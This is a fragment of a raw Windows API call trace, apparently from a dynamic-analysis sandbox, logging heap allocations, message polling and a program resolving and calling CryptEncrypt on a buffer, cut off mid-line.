PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0149.092] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.092] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.092] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0149.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0149.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0149.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0149.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0149.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0149.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0149.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0149.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0149.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2e96028 [0149.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e96028 | out: hHeap=0x970000) returned 1 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0149.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0149.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0149.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0149.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0149.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0149.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0149.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.297] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542b0 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0149.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0149.297] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15cf0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15cf8) returned 1 [0149.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0149.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0149.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0149.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: 